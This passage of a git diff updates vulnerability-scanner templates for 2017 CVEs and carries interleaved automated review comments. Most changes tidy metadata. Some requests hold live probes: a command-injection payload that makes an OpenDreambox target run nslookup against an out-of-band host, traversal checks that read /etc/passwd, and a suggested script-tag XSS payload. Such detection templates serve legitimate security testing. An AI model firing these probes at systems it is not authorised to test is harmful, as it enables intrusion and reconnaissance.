CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2017-12615 cwe-id: CWE-434 + tags: cve,cve2017,apache,rce,tomcat requests: - method: PUT @@ -48,8 +52,8 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" - part: body + - "root:.*:0:0:" + - type: status status: - 200 diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index bcfeceeb5f..ea0227d45b 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml 
@@ -1,21 +1,21 @@ id: CVE-2017-12629 info: - name: Apache Solr <= 7.1 XML entity injection + name: Apache Solr <= 7.1 - XML Entity Injection author: dwisiswant0 severity: critical - tags: cve,cve2017,solr,apache,oast,xxe + description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - https://twitter.com/honoki/status/1298636315613974532 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - description: "Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. 
Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr." + tags: cve,cve2017,solr,apache,oast,xxe requests: - raw: @@ -29,7 +29,7 @@ requests: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" @@ -39,4 +39,6 @@ requests: name: core group: 1 regex: - - '"name"\:"(.*?)"' \ No newline at end of file + - '"name"\:"(.*?)"' + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml index 7e7edb5586..2999c299a2 100644 --- a/cves/2017/CVE-2017-12635.yaml +++ b/cves/2017/CVE-2017-12635.yaml 
@@ -1,17 +1,21 @@ id: CVE-2017-12635 info: - name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation + name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation author: pikpikcu severity: critical - description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. - reference: https://github.com/assalielmehdi/CVE-2017-12635 - tags: cve,cve2017,couchdb + description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. 
The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-12635 + - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E + - http://www.securityfocus.com/bid/101868 + - https://security.gentoo.org/glsa/201711-16 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2017-12635 cwe-id: CWE-269 + tags: cve,cve2017,couchdb,apache requests: - raw: @@ -31,19 +35,21 @@ requests: matchers-condition: and matchers: - type: word + part: header words: - "application/json" - "Location:" - part: header - type: word + part: body words: - "org.couchdb.user:poc" - "conflict" - "Document update conflict" - part: body - type: status status: - 201 - 409 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml index 905e10391a..572bcf7a8c 100644 --- a/cves/2017/CVE-2017-12637.yaml +++ b/cves/2017/CVE-2017-12637.yaml 
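Review bot: The rewritten description introduces a typo that the old text did not have: `duplicate keysfor 'roles'` should be `duplicate keys for 'roles'`. The remainder of the sentence, the added references, the score formatting and the moved `part:` keys in the matcher block all look fine.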
@@ -5,16 +5,17 @@ info: author: apt-mirror severity: high description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. - tags: cve,cve2017,sap,lfi reference: - https://www.cvedetails.com/cve/CVE-2017-12637/ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf + - http://www.sh0w.top/index.php/archives/7/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2017-12637 cwe-id: CWE-22 + tags: cve,cve2017,sap,lfi,java,traversal requests: - method: GET diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml index ad1ea847cc..02b2f66ae2 100644 --- a/cves/2017/CVE-2017-12794.yaml +++ b/cves/2017/CVE-2017-12794.yaml 
@@ -1,20 +1,22 @@ id: CVE-2017-12794 info: - name: Django debug page XSS + name: Django Debug Page - Cross-Site Scripting author: pikpikcu severity: medium + description: | + Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - description: | - In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. - tags: xss,django,cve,cve2017 + - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ + - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 + tags: xss,django,cve,cve2017 requests: - method: GET @@ -36,3 +38,5 @@ requests: words: - "text/html" part: header + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2017/CVE-2017-14135.yaml b/cves/2017/CVE-2017-14135.yaml new file mode 100644 index 0000000000..3f7e57637b --- /dev/null +++ b/cves/2017/CVE-2017-14135.yaml 
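Review bot: The last sentence of the new description is ungrammatical — `since run with "DEBUG = True" is not on by default (which is what makes the page visible)`; suggest `since the technical 500 page is only rendered when "DEBUG = True", which is not the default setting.` The first two sentences of the rewritten description read correctly and need no change.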
@@ -0,0 +1,46 @@ +id: CVE-2017-14135 + +info: + name: OpenDreambox 2.0.0 - Remote Code Execution + author: alph4byt3 + severity: critical + description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py. + reference: + - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/ + - https://www.exploit-db.com/exploits/42293 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14135 + - https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-14135 + cwe-id: CWE-78 + metadata: + shodan-query: title:"Dreambox WebControl" + tags: cve,cve2017,dreambox,rce,oast + +requests: + - raw: + - | + GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "/bin/sh" + - "/usr/script" + condition: and + + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index a9b3be6385..b116743885 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml 
@@ -1,19 +1,21 @@ id: CVE-2017-14535 info: - name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability + name: Trixbox - 2.8.0.4 OS Command Injection author: pikpikcu severity: high + description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. reference: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 - tags: cve,cve2017,trixbox,rce + - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 + - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-14535 cwe-id: CWE-78 - description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." + tags: cve,cve2017,trixbox,rce,injection requests: - raw: @@ -31,8 +33,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/04/01 diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 03689a2002..66f9cfe5ba 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml 
@@ -1,20 +1,20 @@
id: CVE-2017-14537
info:
- name: trixbox 2.8.0 - directory-traversal
+ name: Trixbox 2.8.0 - Path Traversal
author: pikpikcu
severity: medium
- tags: cve,cve2017,trixbox,lfi
- description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
+ description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- - https://sourceforge.net/projects/asteriskathome/ # vendor homepage
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
+ - https://sourceforge.net/projects/asteriskathome/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 6.50
+ cvss-score: 6.5
cve-id: CVE-2017-14537
cwe-id: CWE-22
+ tags: cve,cve2017,trixbox,lfi
requests:
- raw:
@@ -47,3 +47,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
+
+# Enhanced by mp on 2022/04/26
diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml
index 91fc63e9f3..401d1e3040 100644
--- a/cves/2017/CVE-2017-14651.yaml
+++ b/cves/2017/CVE-2017-14651.yaml
@@ -1,20 +1,21 @@
id: CVE-2017-14651
info:
- name: Reflected XSS - WSO2 Data Analytics Server
+ name: WSO2 Data Analytics Server 3.1.0 - Reflected Cross-Site Scripting
author: mass0ma
severity: medium
- description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
- tags: cve,cve2017,wso2,xss
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 4.80
- cve-id: CVE-2017-14651
- cwe-id: CWE-79
+ description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
reference:
- https://github.com/cybersecurityworks/Disclosed/issues/15
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265
- https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-14651
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2017-14651
+ cwe-id: CWE-79
+ tags: cve,cve2017,wso2,xss
requests:
- method: GET
@@ -34,4 +35,6 @@ requests:
- type: word
words:
- "text/html"
- part: header
\ No newline at end of file
+ part: header
+
+# Enhanced by mp on 2022/04/14
diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml
index 6a386ab381..87a14fe679 100644
--- a/cves/2017/CVE-2017-14849.yaml
+++ b/cves/2017/CVE-2017-14849.yaml
@@ -5,16 +5,16 @@ info:
author: Random_Robbie
severity: high
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
- tags: cve,cve2017,nodejs,lfi
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
- cve-id: CVE-2017-14849
- cwe-id: CWE-22
reference:
- https://twitter.com/nodejs/status/913131152868876288
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
- http://www.securityfocus.com/bid/101056
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2017-14849
+ cwe-id: CWE-22
+ tags: cve,cve2017,nodejs,lfi
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-15287.yaml b/cves/2017/CVE-2017-15287.yaml
new file mode 100644
index 0000000000..144181dec3
--- /dev/null
+++ b/cves/2017/CVE-2017-15287.yaml
@@ -0,0 +1,32 @@
+id: CVE-2017-15287
+
+info:
+ name: Dreambox WebControl 2.0.0 - Cross-Site Scripting
+ author: pikpikcu
+ severity: medium
+ description: |
+ Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
+ reference:
+ - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
+ - https://www.exploit-db.com/exploits/42986/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-15287
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2017-15287
+ cwe-id: CWE-79
+ tags: cve,cve2017,xss,dreambox
+
+requests:
+ - raw:
+ - |
+ GET /webadmin/pkg?command= HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers:
+ - type: word
+ words:
+ - 'Unknown command: '
+
+# Enhanced by mp on 2022/04/26
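Review bot: The CVE-2017-15287 request sends `command=` with no payload and the sole matcher is the literal `Unknown command: ` (no `part`, no content-type or status check), so this template fingerprints the `/webadmin/pkg` endpoint rather than demonstrating reflected XSS, and the description it carries talks about a different vector ("Name des Bouquets", `/file`) than the request exercises. The linked exploit-db entry describes the `command` value being echoed into that error message; assuming the reflection is unescaped — which I cannot confirm from here and which should be checked against a live instance — inject a marker and match on its verbatim reflection together with an HTML content type. The `Content-Type: application/x-www-form-urlencoded` header on a body-less GET can go.
```yaml
requests:
  - raw:
      - |
        GET /webadmin/pkg?command=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Unknown command: <script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
```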
diff --git a/cves/2017/CVE-2017-15363.yaml b/cves/2017/CVE-2017-15363.yaml
index aafe16b2b5..2847c25a96 100644
--- a/cves/2017/CVE-2017-15363.yaml
+++ b/cves/2017/CVE-2017-15363.yaml
@@ -1,17 +1,20 @@
id: CVE-2017-15363
+
info:
- name: Typo3 Restler Extension - Local File Disclosure
+ name: TYPO3 Restler - Arbitrary File Retrieval
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.
reference:
- https://www.exploit-db.com/exploits/42985
- https://www.cvedetails.com/cve/CVE-2017-15363
+ - https://extensions.typo3.org/extension/restler/
+ - https://extensions.typo3.org/extension/download/restler/1.7.1/zip/
classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-15363
- cwe-id: CWE-98
+ cwe-id: CWE-22
tags: cve,cve2017,restler,lfi
requests:
diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml
index 57a6eda186..eb06edfa05 100644
--- a/cves/2017/CVE-2017-15647.yaml
+++ b/cves/2017/CVE-2017-15647.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://www.exploit-db.com/exploits/44054
- https://www.cvedetails.com/cve/CVE-2017-15647
- tags: cve,cve2017,lfi,router
+ - https://blogs.securiteam.com/index.php/archives/3472
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2017-15647
cwe-id: CWE-22
+ tags: cve,cve2017,lfi,router
requests:
- method: GET
@@ -25,7 +26,7 @@ requests:
- type: regex
regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
- type: status
status:
diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml
index 2a2853e552..9bdb3d8f37 100644
--- a/cves/2017/CVE-2017-15715.yaml
+++ b/cves/2017/CVE-2017-15715.yaml
@@ -3,15 +3,19 @@ id: CVE-2017-15715
info:
name: Apache Arbitrary File Upload
author: geeknik
- description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
- reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
severity: high
- tags: cve,cve2017,apache,httpd,fileupload
+ description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
+ - https://httpd.apache.org/security/vulnerabilities_24.html
+ - http://www.openwall.com/lists/oss-security/2018/03/24/6
+ - http://www.securitytracker.com/id/1040570
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.10
+ cvss-score: 8.1
cve-id: CVE-2017-15715
cwe-id: CWE-20
+ tags: cve,cve2017,apache,httpd,fileupload
requests:
- raw:
diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml
index 48553abee3..ffbe9d78c8 100644
--- a/cves/2017/CVE-2017-15944.yaml
+++ b/cves/2017/CVE-2017-15944.yaml
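Review bot: The new `description:` line still reads "the expression specified in could match '$'", which has no object after "in" — the directive name has gone missing, presumably `<FilesMatch>` swallowed as an HTML tag somewhere between the advisory and this file, and the commit re-adds the line verbatim with the hole intact. Restore it so the sentence is complete: `description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. ...` (cross-check the exact token against the Apache advisory now linked in `reference:`). A `<` in the middle of a plain YAML scalar is legal, so no quoting is needed.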
@@ -1,16 +1,18 @@
id: CVE-2017-15944
info:
- name: PreAuth RCE on Palo Alto GlobalProtect
+ name: Palo Alto Network PAN-OS - Remote Code Execution
author: emadshanab,milo2012
- description: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
+ severity: critical
+ description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
reference:
- https://www.exploit-db.com/exploits/43342
+ - https://security.paloaltonetworks.com/CVE-2017-15944
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
- severity: critical
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-15944
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2017-15944
tags: cve,cve2017,rce,vpn,panos,globalprotect
@@ -30,4 +32,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/04/26
diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml
index e4057dae37..2a15ee382b 100644
--- a/cves/2017/CVE-2017-16806.yaml
+++ b/cves/2017/CVE-2017-16806.yaml
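Review bot: The new `name:` and `description:` spell the vendor "Palo Alto Network"; the dropped description and the `security.paloaltonetworks.com` reference added in the same hunk both have it as "Palo Alto Networks", so use `name: Palo Alto Networks PAN-OS - Remote Code Execution` and `description: Palo Alto Networks PAN-OS and Panorama before 6.1.19, ...`. The rename also removes "GlobalProtect"/"PreAuth" from the title while `tags:` keeps `globalprotect` and the orange.tw "attacking-ssl-vpn" post stays in `reference:`; given the description attributes this CVE to the management interface, both the tag and that reference are worth re-checking for relevance rather than carried forward by inertia.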
@@ -3,15 +3,19 @@ id: CVE-2017-16806
info:
name: Ulterius Server < 1.9.5.0 - Directory Traversal
author: geeknik
- reference: https://www.exploit-db.com/exploits/43141
severity: high
- tags: cve,cve2017,ulterius,traversal
+ description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
+ reference:
+ - https://www.exploit-db.com/exploits/43141
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-16806
+ - https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee
+ - https://www.exploit-db.com/exploits/43141/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2017-16806
cwe-id: CWE-22
- description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal."
+ tags: cve,cve2017,ulterius,traversal
requests:
- method: GET
@@ -30,3 +34,6 @@ requests:
- "\\[(font|extension|file)s\\]"
condition: or
part: body
+
+
+# Enhanced by mp on 2022/04/26
diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml
index ed8c14a5be..ad719516c5 100644
--- a/cves/2017/CVE-2017-16877.yaml
+++ b/cves/2017/CVE-2017-16877.yaml
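Review bot: The rebuilt `reference:` list for CVE-2017-16806 contains the same exploit-db entry twice — `https://www.exploit-db.com/exploits/43141` and `https://www.exploit-db.com/exploits/43141/` differ only by a trailing slash — so drop the second one. The second hunk in this file appends two blank lines before `# Enhanced by mp on 2022/04/26` where every other template in the commit uses one; trim to a single blank line for consistency.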
@@ -5,13 +5,15 @@ info:
author: pikpikcu
severity: high
description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information.
- reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
- tags: cve,cve2017,nextjs,lfi
+ reference:
+ - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
+ - https://github.com/zeit/next.js/releases/tag/2.4.1
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2017-16877
cwe-id: CWE-22
+ tags: cve,cve2017,nextjs,lfi,traversal
requests:
- method: GET
@@ -23,7 +25,7 @@ requests:
- type: regex
regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
part: body
condition: and
diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml
index 9eb08d7a3a..4148e13038 100644
--- a/cves/2017/CVE-2017-17043.yaml
+++ b/cves/2017/CVE-2017-17043.yaml
@@ -5,13 +5,17 @@ info:
author: daffainfo
severity: medium
description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-17043
+ - https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/
+ - https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt
+ - https://wpvulndb.com/vulnerabilities/8964
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-17043
cwe-id: CWE-79
+ tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml
index 5fcc0923df..fe491e117d 100644
--- a/cves/2017/CVE-2017-17059.yaml
+++ b/cves/2017/CVE-2017-17059.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-17059
cwe-id: CWE-79
+ tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: POST
diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml
index 2cd0371034..69e1e0c84d 100644
--- a/cves/2017/CVE-2017-17451.yaml
+++ b/cves/2017/CVE-2017-17451.yaml
@@ -5,13 +5,17 @@ info:
author: daffainfo
severity: medium
description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-17451
+ - https://wordpress.org/plugins/wp-mailster/#developers
+ - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html
+ - https://wpvulndb.com/vulnerabilities/8973
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2017-17451
cwe-id: CWE-79
+ tags: cve,cve2017,wordpress,xss,wp-plugin
requests:
- method: GET
